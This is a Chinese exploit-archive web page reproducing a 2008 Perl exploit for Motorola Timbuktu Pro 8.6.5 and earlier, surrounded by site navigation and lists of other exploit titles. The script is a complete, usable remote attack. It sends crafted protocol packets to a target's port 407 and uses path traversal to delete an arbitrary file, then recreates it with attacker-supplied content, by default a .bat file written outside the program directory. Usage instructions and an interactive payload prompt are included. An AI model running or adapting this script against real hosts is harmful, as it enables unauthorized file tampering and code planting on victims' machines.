首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit 来源：titon{at}bastardlabs{dot}com 作者：titon 发布时间：2008-03-12   #!/usr/bin/perl #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation # # Bug & Exploit by titon [titon{at}bastardlabs{dot}com] # # Advisory: # http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 # # Copyright: (c)2007 BastardLabs #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # # Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407 # #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO use IO::Socket; use Time::HiRes qw(usleep); ## ## we start in the C:\Program Files\Timbuktu Pro\N1\ folder ## $filename = &promptUser("Filename" ,"\\../../../pnw3d.bat"); ##$filename = &promptUser("Filename" ,"../../../pnw3d.bat"); $payload = &promptUser("Payload ","echo pwwwnnn333ddd !!"); ## ##payload can be either text or binary (in \x42\x69\x42 format) ## $payload =~ s/\\x(..)/pack("C",hex($1))/egi; ## ## packet1 == “hello” packet ## $packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b". "\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d". "\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00"; $packet2= "\xff"; ## ## packet3 == packet containing the filename (with directory traversal) ## $packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94". "\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00". "\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ; $packet4= "\xf9\x00"; ## ## packet5 == payload, the size of the payload is over 2 bytes ## so we have 65535 bytes of data to play with ## $packet5= "\xf8" . pack("n",length($payload)) . $payload ; $packet6= "\xf7"; $packet7= "\xfa"; $packet8= "\xfe"; ## ##DELETE THE FILE (IF NECESSARY) ## print "[+] Delete the file (if necessary)\n"; print "[+] Connecting...\n"; $remote = &connection("$ARGV[0]","$ARGV[1]"); print "[+] Connected to $ARGV[0]:$ARGV[1]\n"; print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000); print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000); print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000); ## ## we break the connection before it's completed (i.e before the \xfe) ## close $remote; ## ##(RE)CREATE THE FILE ## print "[+] (Re)Create the file with our content\n"; print "[+] Connecting...\n"; $remote = &connection("$ARGV[0]","$ARGV[1]"); print "[+] Connected to $ARGV[0]:$ARGV[1]\n"; print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000); print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000); print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000); print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000); print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000); print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000); print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000); print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000); close $remote; sub connection { local($dest,$port) = @_; my $remote; if (!$port or !dest) { print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; } else { $remote = IO::Socket::INET->new( Proto => tcp, PeerAddr => $dest, PeerPort => $port, Timeout => 1) or print "[-] Error: Could not establish a connection to $dest:$port\n" and exit; return $remote; } } sub promptUser { local($promptString,$defaultValue) = @_; if ($defaultValue) { print $promptString, "[", $defaultValue, "]: "; } else { print $promptString, ": "; } $| = 1; # force a flush after our print $_ = <STDIN>; # get the input from STDIN chomp; if ("$defaultValue") { return $_ ? $_ : $defaultValue; # return $_ if it has a value } else { return $_; } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·phpMyNewsletter <= 0.8b5 (arch ·MailEnable SMTP Service VRFY/E ·Solaris 8/9/10 fifofs I_PEEK L ·Motorola Timbuktu Pro 8.6.5/8. ·KingSoft UpdateOcx2.dll SetUni ·Danneo CMS <= 0.5.1 Remote Bli ·VHCS <= 2.4.7.1 (vhcs2_daemon) ·QuickTalk Forum <= 1.6 Remote ·zKup CMS 2.0 <= 2.3 Remote Upl ·Timbuktu Pro Remote Path Trave ·zKup CMS 2.0 <= 2.3 Remote Add ·Timbuktu Pro Remote Path Trave   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved